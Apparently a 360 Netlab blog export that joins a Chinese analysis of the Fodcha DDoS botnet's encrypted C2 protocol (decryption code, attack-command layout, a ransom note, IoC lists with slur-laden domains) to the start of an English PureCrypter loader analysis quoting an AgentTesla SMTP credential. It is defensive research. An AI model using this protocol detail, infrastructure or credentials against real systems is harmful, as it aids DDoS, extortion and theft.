<p>Bot&#x4E3B;&#x52A8;&#x5411;C2&#x53D1;&#x9001;<strong>netstage=6</strong>&#x7684;&#x521D;&#x59CB;&#x5316;&#x6D88;&#x606F;&#xFF0C;&#x8FD9;&#x4E2A;&#x6D88;&#x606F;&#x7684;&#x683C;&#x5F0F;&#x4E3A;head+body&#xFF0C;&#x5404;&#x5B57;&#x6BB5;&#x542B;&#x4E49;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageOneb2c.png" width="860px"> 
<h4 id="head">head</h4>
<p>head&#x7684;&#x957F;&#x5EA6;&#x4E3A;7 bytes&#xFF0C;&#x683C;&#x5F0F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code>06     		----&gt;netstage,1byte,06 means init
f0 70       ----&gt;tcpip checksum, 2byte, 
00 16		----&gt;length of body, 2 bytes
</code></pre>
<h4 id="checksum">checksum</h4>
<p>head&#x4E2D;&#x7684;checksum&#x4F7F;&#x7528;&#x7684;&#x662F;tcp/ip&#x7684;checksum&#xFF0C;&#x5B83;&#x8BA1;&#x7B97;&#x5BF9;&#x8C61;&#x4E3A;&#x6574;&#x4E2A;payload&#xFF0C;checksum&#x6240;&#x5728;&#x504F;&#x79FB;&#x7684;&#x539F;&#x59CB;&#x503C;&#x4E3A;&quot;\x00\x00&quot;&#xFF0C;checksum&#x7684;python&#x5B9E;&#x73B0;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF1A;</p>
<pre><code class="language-python">def checksum(data):
    s = 0
    n = len(data) % 2
    for i in range(0, len(data)-n, 2):
        s+= ord(data[i]) + (ord(data[i+1]) &lt;&lt; 8)
    if n:
        s+= ord(data[-1])
    while (s &gt;&gt; 16):
        s = (s &amp; 0xFFFF) + (s &gt;&gt; 16)
        s = ~s &amp; 0xffff
    return s

buf=&quot;\x06\x00\x00\x00\x00\x00\x16\x36\x93\x93\xb7\x27\x5c\x9a\x2a\x16\x09\xd8\x13\x32\x01\xd2\x69\x1d\x25\xf3\x42\x00\x32&quot;
print(hex(checksum(buf)))

#hex(checksum(buf))
#0x70f0
</code></pre>
<h4 id="body">body</h4>
<p>body&#x4E3A;&#x968F;&#x673A;&#x751F;&#x6210;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x65E0;&#x610F;&#x4E49;&#x3002;</p>
<pre><code>00000000  36 93 93 b7 27 5c 9a 2a 16 09 d8 13 32 01 d2 69
00000010  1d 25 f3 42 00 32
</code></pre>
<h3 id="%E9%98%B6%E6%AE%B51%EF%BC%9Ac2bot%EF%BC%8C%E5%85%B12%E8%BD%AE">&#x9636;&#x6BB5;1&#xFF1A;C2---&gt;Bot&#xFF0C;&#x5171;2&#x8F6E;</h3>
<p>&#x5F53;C2&#x6536;&#x5230;Bot&#x7684;<strong>netstage=6</strong>&#x7684;&#x6D88;&#x606F;&#x540E;&#xFF0C;&#x5C31;&#x4F1A;&#x5411;BOT&#x53D1;&#x9001;2&#x8F6E;&#x7684;&#x6570;&#x636E;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageOne.png" width="860px"> 
<ul>
<li>
<p>&#x7B2C;&#x4E00;&#x8F6E;&#xFF0C;36 bytes , &#x539F;&#x4FE1;&#x606F;&#x88AB;xxtea&#x52A0;&#x5BC6;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x4F5C;&#x4E3A;chacha20&#x7684;key&#xFF0C;&#x957F;&#x5EA6;&#x4E3A;32bytes</p>
<pre><code class="language-python">import hexdump
import xxtea
key=b&quot;PJbiNbbeasddDfsc&quot;
keyBuf=bytes.fromhex(&quot;806d8806cd5460d8996339fbf7bac34ba1e20f792872ba0e05d096ad92a5535e60e55b8d&quot;)
chaKey=xxtea.decrypt(keyBuf,key)
hexdump.hexdump(chaKey)

#chaKey
00000000: E6 7B 1A E3 A4 4B 13 7F  14 15 5E 99 31 F2 5E 3A
00000010: D7 7B AB 0A 4D 5F 00 EF  0C 01 9F 86 94 A4 9D 4B

</code></pre>
</li>
<li>
<p>&#x7B2C;&#x4E8C;&#x8F6E;&#xFF0C;16 bytes&#xFF0C;&#x539F;&#x4FE1;&#x606F;&#x88AB;xxtea&#x52A0;&#x5BC6;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x4F5C;&#x4E3A;chacha20&#x7684;nonce&#xFF0C;&#x957F;&#x5EA6;12bytes</p>
<pre><code class="language-python">import hexdump
import xxtea
key=b&quot;PJbiNbbeasddDfsc&quot;
nonBuf=bytes.fromhex(&quot;22c803bb310c5b2512e76a472418f9ee&quot;)
chaNonce=xxtea.decrypt(nonBuf,key)
hexdump.hexdump(chaNonce)

#chaNonce
00000000: 98 79 59 57 A8 BA 7E 13  59 9F 59 6F
</code></pre>
</li>
</ul>
<h3 id="%E9%98%B6%E6%AE%B52%EF%BC%9Abotc2%EF%BC%8Cchacha20%E5%8A%A0%E5%AF%86">&#x9636;&#x6BB5;2&#xFF1A;Bot---&gt;C2&#xFF0C;chacha20&#x52A0;&#x5BC6;</h3>
<p>Bot&#x6536;&#x5230;chacha20&#x7684;key&#x548C;nonce&#x540E;&#xFF0C;&#x5C31;&#x5411;C2&#x53D1;&#x9001;<strong>netstage=4</strong>&#x7684;&#x6D88;&#x606F;&#xFF0C;&#x6B64;&#x6B21;&#x6D88;&#x606F;&#x4F7F;&#x7528;chacha20&#x52A0;&#x5BC6;&#xFF0C;key&amp;nonce&#x7531;&#x4E0A;&#x4E00;&#x9636;&#x6BB5;&#x83B7;&#x5F97;&#xFF0C;&#x52A0;&#x5BC6;&#x7684;&#x8F6E;&#x6570;&#x4E3A;1&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageTwob2c.png" width="860px"> 
<p>&#x6211;&#x4EEC;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x4E0B;&#x9762;&#x7684;python&#x4EE3;&#x7801;&#x53EF;&#x4EE5;&#x89E3;&#x5BC6;&#x4E0A;&#x9762;&#x7684;&#x6D41;&#x91CF;&#xFF0C;</p>
<pre><code>from Crypto.Cipher import ChaCha20
cha=ChaCha20.new(key=chaKey,nonce=chaNonce)
cha.seek(64)
tmp=bytes.fromhex(&apos;dc23c56943431018b61262481ce5a219da9480930f08714e017edc56bf903d32ac5daeb8314f1bf7e6&apos;)
rnd3=cha.decrypt(tmp)
</code></pre>
<p>&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x6D41;&#x91CF;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x5B83;&#x7684;&#x683C;&#x5F0F;&#x4F9D;&#x7136;&#x662F;&#x524D;&#x6587;&#x6240;&#x8FF0;&#x7684;head&#xFF08;7 bytes&#xFF09;+body&#xFF0C;&#x5176;&#x4E2D;head&#x7684;netstage&#x5B57;&#x6BB5;&#x7684;&#x503C;&#x4E3A;04&#xFF0C;&#x4EE3;&#x8868;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainb2c.png" width="860px"> 
<h3 id="%E9%98%B6%E6%AE%B52%EF%BC%9Ac2bot%EF%BC%8Cchacha20%E5%8A%A0%E5%AF%86">&#x9636;&#x6BB5;2&#xFF1A;C2---&gt;Bot&#xFF0C;chacha20&#x52A0;&#x5BC6;</h3>
<p>C2&#x5728;&#x6536;&#x5230;Bot&#x7684;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;&#x6D88;&#x606F;&#x540E;&#xFF0C;&#x4E5F;&#x5411;Bot&#x7684;&#x6570;&#x636E;&#x53D1;&#x9001;<strong>netstage=4</strong>&#x7684;&#x6D88;&#x606F;&#xFF0C;&#x540C;&#x6837;&#x4F7F;&#x7528;chacha20&#x52A0;&#x5BC6;&#xFF0C;&#x4E14;key,nonce,&#x8F6E;&#x6570;&#x548C;Bot&#x4F7F;&#x7528;&#x7684;&#x662F;&#x4E00;&#x6837;&#x7684;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageTwoc2b.png" width="860px"> 
<p>&#x4F7F;&#x7528;&#x548C;Bot&#x76F8;&#x540C;&#x7684;&#x4EE3;&#x7801;&#x89E3;&#x5BC6;&#x6D41;&#x91CF;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5B83;&#x7684;&#x683C;&#x5F0F;&#x4E5F;&#x662F;head+body&#xFF0C;netstage&#x7684;&#x503C;&#x4E5F;&#x4E3A;04&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainc2b.png" width="860px"> 
<p>&#x5728;Bot&#x548C;C2&#x4E92;&#x53D1;<strong>netstage=4</strong>&#x7684;&#x6D88;&#x606F;&#x4E4B;&#x540E;&#xFF0C;&#x4EE3;&#x8868;&#x9636;&#x6BB5;1&#x7684;chacha20 key&amp;nonce&#x88AB;&#x53CC;&#x65B9;&#x8BA4;&#x53EF;&#xFF0C;&#x5F7C;&#x6B64;&#x7684;&#x8EAB;&#x4EFD;&#x8BA4;&#x8BC1;&#x5B8C;&#x6210;&#xFF0C;Bot&#x8FDB;&#x5165;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x51C6;&#x5907;&#x4E0A;&#x7EBF;&#x3002;</p>
<h3 id="%E9%98%B6%E6%AE%B53%EF%BC%9Abotc2%EF%BC%8C%E5%85%B12%E8%BD%AE%EF%BC%8Cchacha%E5%8A%A0%E5%AF%86">&#x9636;&#x6BB5;3&#xFF1A;Bot---&gt;C2&#xFF0C;&#x5171;2&#x8F6E;&#xFF0C;chacha&#x52A0;&#x5BC6;</h3>
<p>Bot&#x5411;C2&#x53D1;&#x9001;<strong>netstage=5</strong>&#x7684;&#x6D88;&#x606F;&#xFF0C;&#x8868;&#x793A;&#x51C6;&#x5907;&#x4E0A;&#x7EBF;&#xFF0C;&#x63A5;&#x7740;&#x518D;&#x81EA;&#x5DF1;&#x7684;&#x5206;&#x7EC4;&#x4FE1;&#x606F;&#x4E0A;&#x62A5;&#x7ED9;C2&#xFF0C;&#x8FD9;2&#x8F6E;&#x6D88;&#x606F;&#x4E5F;&#x4F7F;&#x7528;chacha20&#x52A0;&#x5BC6;&#x3002;</p>
<ul>
<li>
<p>&#x7B2C;&#x4E00;&#x8F6E;<br>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageThrReg.png" width="860px"></p>
</li>
<li>
<p>&#x7B2C;&#x4E8C;&#x8F6E;</p>
 <img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netStageThrGroup.png" width="860px"> 
</li>
</ul>
<p>&#x4E0A;&#x8FF0;2&#x8F6E;&#x7684;&#x6570;&#x636E;&#x89E3;&#x5BC6;&#x540E;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x5206;&#x7EC4;&#x7684;&#x5185;&#x5BB9;&#x6B63;&#x662F;&#x9884;&#x8BBE;&#x7684;&quot;<code>fsdsaD</code>&quot;&#xFF0C;&#x8FD9;&#x4EE3;&#x8868;&#x6211;&#x4EEC;&#x7684;&#x5206;&#x6790;&#x662F;&#x6B63;&#x786E;&#x7684;&#xFF0C;&#x81F3;&#x6B64;Bot&#x6210;&#x529F;&#x4E0A;&#x7EBF;&#xFF0C;&#x5F00;&#x59CB;&#x7B49;&#x5F85;&#x6267;&#x884C;C2&#x4E0B;&#x53D1;&#x7684;&#x6307;&#x4EE4;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_netplainb2cReg.png" width="860px"> 
<h3 id="0x4%E6%89%A7%E8%A1%8C%E6%8C%87%E4%BB%A4">0x4:&#x6267;&#x884C;&#x6307;&#x4EE4;</h3>
<p>Bot&#x6210;&#x529F;&#x4E0A;&#x7EBF;&#x540E;&#xFF0C;&#x652F;&#x6301;&#x7684;netstage&#x7F16;&#x53F7;&#xFF0C;&#x5982;&#x4E0B;&#x6240;&#x56FE;&#x6240;&#x793A;&#xFF0C;&#x5176;&#x4E2D;&#x6700;&#x91CD;&#x8981;&#x7684;&#x5C31;&#x662F;<strong>netstage=1</strong>&#x4EE3;&#x8868;DDoS&#x4EFB;&#x52A1;&#xFF0C;Fodcha&#x590D;&#x7528;&#x4E86;&#x5927;&#x91CF;Mirai&#x7684;&#x653B;&#x51FB;&#x4EE3;&#x7801;&#xFF0C;&#x4E00;&#x5171;&#x652F;&#x6301;17&#x79CD;&#x653B;&#x51FB;&#x65B9;&#x6CD5;&#x3002;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_afterreg.png" width="860px"> 
<p>&#x4EE5;&#x4E0B;&#x56FE;&#x7684;DDos_Task&#x6D41;&#x91CF;&#xFF08;netstage=01&#xFF09;&#x4E3A;&#x4F8B;&#xFF1A;</p>
<img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_taskddos.png" width="860px"> 
<p>&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x4F9D;&#x7136;&#x91C7;&#x7528;chacha20&#x52A0;&#x5BC6;&#xFF0C;&#x89E3;&#x5BC6;&#x540E;&#x7684;&#x6307;&#x4EE4;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x76F8;&#x4FE1;&#x719F;&#x6089;Mirai&#x7684;&#x8BFB;&#x8005;&#x770B;&#x5230;&#x6B64;&#x5904;&#x80AF;&#x5B9A;&#x4F1A;&#x5FC3;&#x4E00;&#x7B11;&#x3002;</p>
<pre><code>00000000: 00 00 00 3C 07 01 xx 14  93 01 20 02 00 00 02 01
00000010: BB 01 00 02 00 01
</code></pre>
<p>&#x4E0A;&#x8FF0;&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x7684;&#x683C;&#x5F0F;&#x548C;&#x89E3;&#x6790;&#x65B9;&#x5F0F;&#x5982;&#x4E0B;&#x8868;&#x6240;&#x793A;&#xFF1A;</p>
<table>
<thead>
<tr>
<th>offset</th>
<th>len (bytes)</th>
<th>value</th>
<th>meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>4</td>
<td>00 00 00 3c</td>
<td>Duration</td>
</tr>
<tr>
<td>0x04</td>
<td>1</td>
<td>07</td>
<td>Attack Vector&#xFF0C;07</td>
</tr>
<tr>
<td>0x05</td>
<td>1</td>
<td>1</td>
<td>Attack Target Cnt</td>
</tr>
<tr>
<td>0x06</td>
<td>4</td>
<td>xx 14  93 01</td>
<td>Attack Target&#xFF0C;xx.20.147.1</td>
</tr>
<tr>
<td>0x0a</td>
<td>1</td>
<td>20</td>
<td>Netmask</td>
</tr>
<tr>
<td>0x0b</td>
<td>1</td>
<td>02</td>
<td>Option Cnt</td>
</tr>
<tr>
<td>0x0c</td>
<td>5</td>
<td>00 00 02 01 bb</td>
<td>OptionId 0&#xFF0C;len 2, value 0x01bb ---&gt; (port 443)</td>
</tr>
<tr>
<td>0x11</td>
<td>5</td>
<td>01 00 02 00 01</td>
<td>OptionId 1, len 2, value 0x0001---&gt; (payload len 1 byte)</td>
</tr>
</tbody>
</table>
<p>&#x5F53;Bot&#x63A5;&#x6536;&#x5230;&#x4E0A;&#x8FF0;&#x6307;&#x4EE4;&#xFF0C;&#x5C31;&#x4F1A;&#x4F7F;&#x7528;payload&#x4E3A;1&#x5B57;&#x8282;&#x7684;tcp&#x62A5;&#x6587;&#x5BF9;&#x76EE;&#x6807;xx.20.147.1:443&#x8FDB;&#x884C;DDoS&#x653B;&#x51FB;&#xFF0C;&#x8FD9;&#x548C;&#x5B9E;&#x9645;&#x6293;&#x5305;&#x7684;&#x6D41;&#x91CF;&#x662F;&#x80FD;&#x5BF9;&#x5E94;&#x4E0A;&#x7684;&#x3002;</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddospacket.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddospacket.png" class="kg-image"></a></p>
<h1 id="%E8%8A%B1%E7%B5%AE">&#x82B1;&#x7D6E;</h1>
<h3 id="0x01-%E7%A7%8D%E6%97%8F%E6%AD%A7%E8%A7%86">0x01: &#x79CD;&#x65CF;&#x6B67;&#x89C6;</h3>
<p>&#x4ECE;&#x67D0;&#x4E9B;OpenNIC C2&#x7684;&#x6784;&#x8BCD;&#x4E0A;&#x6765;&#x8BF4;&#xFF0C;Fodcha&#x7684;&#x4F5C;&#x8005;&#x4F3C;&#x4E4E;&#x5BF9;&#x9EC4;&#x79CD;&#x4EBA;&#xFF0C;&#x9ED1;&#x4EBA;&#x6709;&#x6BD4;&#x8F83;&#x5927;&#x7684;&#x654C;&#x610F;&#x3002;</p>
<pre><code>yellowchinks.geek
wearelegal.geek
funnyyellowpeople.libre
chinksdogeaters.dyn
blackpeeps.dyn
bladderfull.indy

wehateyellow
</code></pre>
<h3 id="0x02-%E6%94%BB%E5%87%BB%E5%8D%B3%E5%8B%92%E7%B4%A2">0x02: &#x653B;&#x51FB;&#x5373;&#x52D2;&#x7D22;</h3>
<p>Fodcha&#x66FE;&#x5728;&#x5176;&#x4E0B;&#x53D1;&#x7684;UDP&#x653B;&#x51FB;&#x6307;&#x4EE4;&#x4E2D;&#xFF0C;&#x9644;&#x5E26;&#x4EE5;&#x4E0B;&#x5B57;&#x4E32;&#xFF1A;</p>
<pre><code>send 10 xmr to 49UnJhpvRRxDXJHYczoUEiK3EKCQZorZWaV6HD7axKGQd5xpUQeNp7Xg9RATFpL4u8dzPfAnuMYqs2Kch1soaf5B5mdfJ1b or we will shutdown your business
</code></pre>
<p>Bot&#x6253;&#x51FA;&#x7684;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x8BE5;&#x94B1;&#x5305;&#x5730;&#x5740;&#x4F3C;&#x4E4E;&#x662F;&#x975E;&#x6CD5;&#x7684;&#xFF0C;&#x6CA1;&#x80FD;&#x7ED9;&#x6211;&#x4EEC;&#x66F4;&#x591A;&#x7684;&#x7EBF;&#x7D22;&#xFF0C;&#x4F46;&#x4ECE;&#x8FD9;&#x4E00;&#x884C;&#x4E3A;&#x51FA;&#x53D1;&#xFF0C;&#x6216;&#x8BB8;Fodcha&#x80CC;&#x540E;&#x7684;&#x8FD0;&#x8425;&#x8005;&#x6B63;&#x5728;&#x5C1D;&#x8BD5;&#x653B;&#x51FB;&#x5373;&#x52D2;&#x7D22;&#x8FD9;&#x79CD;&#x5546;&#x4E1A;&#x6A21;&#x5F0F;&#x3002;<br>
<a href="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddosransom.png"><img src="https://blog.netlab.360.com/content/images/2022/10/fodcha_ddosransom.png" class="kg-image"></a></p>
<h1 id="%E8%81%94%E7%B3%BB%E6%88%91%E4%BB%AC">&#x8054;&#x7CFB;&#x6211;&#x4EEC;</h1>
<p>&#x611F;&#x5174;&#x8DA3;&#x7684;&#x8BFB;&#x8005;&#xFF0C;&#x53EF;&#x4EE5;&#x5728; <a href="https://twitter.com/360Netlab?ref=blog.netlab.360.com">twitter</a> &#x6216;&#x8005;&#x901A;&#x8FC7;&#x90AE;&#x4EF6;netlab[at]360.cn&#x8054;&#x7CFB;&#x6211;&#x4EEC;&#x3002;</p>
<h1 id="%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88">&#x89E3;&#x51B3;&#x65B9;&#x6848;</h1>
<p>&#x57FA;&#x4E8E;Netlab&#x591A;&#x5E74;&#x7814;&#x7A76;&#x5DE5;&#x4F5C;&#x5B75;&#x5316;&#x7684;360&#x5168;&#x7CFB;&#x5217;<a href="https://sdns.360.net/?ref=blog.netlab.360.com">DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;</a>&#x5747;&#x5DF2;&#x652F;&#x6301;&#x6587;&#x4E2D;&#x8FDC;&#x63A7;&#x670D;&#x52A1;&#x5668;&#x7684;&#x62E6;&#x622A;&#x548C;&#x68C0;&#x6D4B;&#xFF0C;&#x540C;&#x65F6;&#x5185;&#x7F6E;&#x591A;&#x79CD;&#x7B97;&#x6CD5;&#x53EF;&#x6709;&#x6548;&#x53D1;&#x73B0;&#x548C;&#x62E6;&#x622A;&#x5404;&#x79CD;&#x672A;&#x77E5;&#x5A01;&#x80C1;&#xFF0C;&#x5EFA;&#x8BAE;&#x4F01;&#x4E1A;&#x5BA2;&#x6237;&#x63A5;&#x5165;360 DNS&#x5B89;&#x5168;SaaS&#x5E73;&#x53F0;&#x6216;&#x90E8;&#x7F72;&#x672C;&#x5730;360DNS&#x5B89;&#x5168;&#x4EA7;&#x54C1;&#xFF0C;&#x53CA;&#x65F6;&#x9632;&#x8303;&#x6B64;&#x7C7B;&#x65B0;&#x578B;&#x5A01;&#x80C1;&#xFF0C;&#x907F;&#x514D;&#x4F01;&#x4E1A;&#x8D44;&#x4EA7;&#x5931;&#x9677;&#x3002;&#x8054;&#x7CFB;&#x4EBA;: <a href="mailto:wangkun-bd@360.cn">wangkun-bd@360.cn</a></p>
<h1 id="ioc">IoC</h1>
<h3 id="c2">C2</h3>
<pre><code>yellowchinks.geek
yellowchinks.dyn
wearelegal.geek
tsengtsing.libre
techsupporthelpars.oss
respectkkk.geek
pepperfan.geek
peepeepoo.libre
obamalover.pirate
milfsfors3x[.]com
funnyyellowpeople.libre
fridgexperts[.]cc
forwardchinks[.]com
folded[.]in
doodleching[.]com
cookiemonsterboob[.]com
chinksdogeaters.dyn
chinkchink.libre
bladderfull.indy
blackpeeps.dyn
91.206.93.243
91.149.232.129
91.149.232.128
91.149.222.133
91.149.222.132
67.207.84.82
54.37.243.73
51.89.239.122
51.89.238.199
51.89.176.228
51.89.171.33
51.161.98.214
46.17.47.212
46.17.41.79
45.88.221.143
45.61.139.116
45.41.240.145
45.147.200.168
45.140.169.122
45.135.135.33
3.70.127.241
3.65.206.229
3.122.255.225
3.121.234.237
3.0.58.143
23.183.83.171
207.154.206.0
207.154.199.110
195.211.96.142
195.133.53.157
195.133.53.148
194.87.197.3
194.53.108.94
194.53.108.159
194.195.117.167
194.156.224.102
194.147.87.242
194.147.86.22
193.233.253.93
193.233.253.220
193.203.12.157
193.203.12.156
193.203.12.155
193.203.12.154
193.203.12.151
193.203.12.123
193.124.24.42
192.46.225.170
185.45.192.96
185.45.192.227
185.45.192.212
185.45.192.124
185.45.192.103
185.198.57.95
185.198.57.105
185.183.98.205
185.183.96.7
185.143.221.129
185.143.220.75
185.141.27.238
185.141.27.234
185.117.75.45
185.117.75.34
185.117.75.119
185.117.73.52
185.117.73.147
185.117.73.115
185.117.73.109
18.185.188.32
18.136.209.2
178.62.204.81
176.97.210.176
172.105.59.204
172.105.55.131
172.104.108.53
170.187.187.99
167.114.124.77
165.227.19.36
159.65.158.148
159.223.39.133
157.230.15.82
15.204.18.232
15.204.18.203
15.204.128.25
149.56.42.246
139.99.166.217
139.99.153.49
139.99.142.215
139.162.69.4
138.68.10.149
137.74.65.164
13.229.98.186
107.181.160.173
107.181.160.172
</code></pre>
<h3 id="reporter">Reporter</h3>
<pre><code>kvsolutions[.]ru
icarlyfanss[.]com
</code></pre>
<h3 id="samples">Samples</h3>
<pre><code>ea7945724837f019507fd613ba3e1da9
899047ddf6f62f07150837aef0c1ebfb
0f781868d4b9203569357b2dbc46ef10
</code></pre>
]]></content:encoded></item><item><title><![CDATA[PureCrypter is busy pumping out various malicious malware families]]></title><description><![CDATA[<p>In our daily botnet analysis work, it is common to encounter various loaders.Compared to other types of malware, loaders are unique in that they are mainly used to &quot;promote&quot;, i.e., download and run other malware on the infected machine. According to our observations, most loaders are</p>]]></description><link>https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/</link><guid isPermaLink="false">63873b9a8b1c1e0007f53021</guid><category><![CDATA[Botnet]]></category><category><![CDATA[PureCrypter]]></category><category><![CDATA[MaaS]]></category><category><![CDATA[malware-as-a-service]]></category><category><![CDATA[AgentTesla]]></category><category><![CDATA[PureMiner]]></category><category><![CDATA[loader]]></category><category><![CDATA[Import 2022-11-30 11:16]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[wanghao]]></dc:creator><pubDate>Mon, 29 Aug 2022 13:00:00 GMT</pubDate><content:encoded><![CDATA[<p>In our daily botnet analysis work, it is common to encounter various loaders.Compared to other types of malware, loaders are unique in that they are mainly used to &quot;promote&quot;, i.e., download and run other malware on the infected machine. According to our observations, most loaders are proprietary and have a binding relationship with the family they are promoting. A few loader families make themselves into promotion platforms that can spread any other malware family, achieving the so-called malware-as-a-service (MaaS). Compared with proprietary loaders, MaaS types are obviously more dangerous and should be our primary target of concern.</p>
<p>This article introduces a MaaS type loader we saw a while ago, named PureCrypter, which is very active this year, promoting more than 10 other families and using hundreds of C2s. Zscaler has done a <a href="https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter?ref=blog.netlab.360.com">detailed sample analysis</a>, this blog mainly introduces the PureCrypter propagation activity we saw from the perspective of C2s and propagation chains to explore the operation of the MaaS type botnet.</p>
<p>The main points of this paper are as follows.</p>
<ul>
<li>PureCrypter is a loader written in C# that has been around since at least 2021 and can propagate any other family.</li>
<li>PureCrypter continues to be active this year and has propagated more than 10 other malware families including Formbook, SnakeKeylogger, AgentTesla, Redline, AsyncRAT, and others.</li>
<li>PureCrypter authors appears to be resourceful, as we have seen hundreds of C2 domains and IPs.</li>
<li>PureCrypter use image name suffixes combined with inversion, compression and encryption to avoid detection.</li>
<li>PureCrypter has a long propagation chain, and most of them use pre-protectors, some times mixed with other loaders, making detection more difficult.</li>
</ul>
<p>In general, the spread of PureCrypter can be summarized in the following figure.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--0--1.png" alt="Image--0--1" loading="lazy"></p>
<p>Now let&#x2019;s look at the samples and some typical propagation cases below.</p>
<h1 id="sample-analysis">Sample analysis</h1>
<p>PureCrypter uses the <a href="https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter?ref=blog.netlab.360.com">package mechanism</a>, which consists of two executables: downloader and injector, both written in C#, where downloader is responsible for propagating the injector, which releases and runs the final payload.</p>
<p>In practice, the attacker generates downloader and injector through builder, and then will try to propagate downloader, which will download and execute injector on the target machine, and then injector will do the rest of the work. In terms of code logic, the downloader module is relatively simple, with a low level of binary obfuscation and no complex operations such as environment detection and persistence, while injector uses common tricks and techniques seen in popular loaders, such as binary obfuscation, runtime environment detection, starting puppet processes, etc. The following is a brief introduction to downloader and injector combined with actual examples.</p>
<h2 id="downloader-module">downloader module</h2>
<p>This module directly calls WebClient&apos;s DownloadData method for HTTP downloads, without setting any HTTP headers.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--11-.png" alt="Image--11-" loading="lazy"></p>
<p>The following is an example of downloading a sample variant with inverted processing, from the parsing code you can see that the HTTP payload is inverted.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--12-.png" alt="Image--12-" loading="lazy"></p>
<p>The inverted PE Header can be found at the end.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--13-.png" alt="Image--13-" loading="lazy"></p>
<p>Finally, the recovered data (.DLL file) is loaded by Assembly.Load, and the entry method of plaintext encoding is called to proceed to the next stage.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--14-.png" alt="Image--14-" loading="lazy"></p>
<p>PureCrypter is relatively simple to protect the injector download, so far, in addition to the above mentioned inverted (reverse) encoding, there are also gzip compression, symmetric encryption, etc. This encoding is fixed, that is, the builder has already determined the encoding method when generating the modules of downloader and injector.</p>
<p>The following is an example of using gzip compression and then transferring the injector, and the magic header of gzip can be found at the beginning: <code>1F 8B 08 00</code>.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--15-.png" alt="Image--15-" loading="lazy"></p>
<p>We have also come across examples where AES encryption is used.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--16-.png" alt="Image--16-" loading="lazy"></p>
<p>In addition to AES, PureCrypter also supports DES, RC4 and other encryption algorithms.</p>
<h2 id="injector-module">injector module</h2>
<p>If you analyze the injector samples restored by downloader, you will find that the latter are heavily obfuscated. Here is an example of an injector obfuscated by SmartAssembly and partially encrypted with resources.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--17-.png" alt="Image--17-" loading="lazy"></p>
<p>As shown in the figure above, first the relevant configuration information can be got from the combo of Reverse + GZip + Protubuf.Deserialize; then the runtime environment is checked to fight against sandboxing, with mutexes creation and persistence being done based on the configuration; and finally the payload is read from the resource section for loading. The sample does not enter any if statement, and soon reaches the last important function, which mainly implements the final payload injection. 4 injection methods are supported. While which one to use depends on the configuration, Process Hollowing is the most frequently used one.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/image.png" alt="image" loading="lazy"></p>
<p>The final payload is stored in the resource.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--18-.png" alt="Image--18-" loading="lazy"></p>
<p>After reversing and gzip decompression, a puppet process is created to start the final payload.</p>
<p><img src="https://blog.netlab.360.com/content/images/2022/08/Image--19-.png" alt="Image--19-" loading="lazy"></p>
<p>The final payload promoted above is AgentTesla, whose configuration information is as follows.</p>
<pre><code>host: raphaellasia.com
port:587
username: origin@raphaellasia.com
pwd: student@1980
to: origin2022@raphaellasia.com
</code></pre>
<h2 id="accidental-discovery">Accidental discovery</h2>
<p>PureCrypter likes to disguise the injector as an image for downloading, the image name is relatively random and has obvious machine generated features. Here are some of the actual detected image names.</p>
<pre><code># pattern 1
/dl/0414/net_Gzhsuovx.bmp
/dl/0528/mars2_Hvvpvuns.bmp
/dl/0528/az_Tsrqixjf.bmp

# pattern 2
/040722/azne_Bvaquebo.bmp
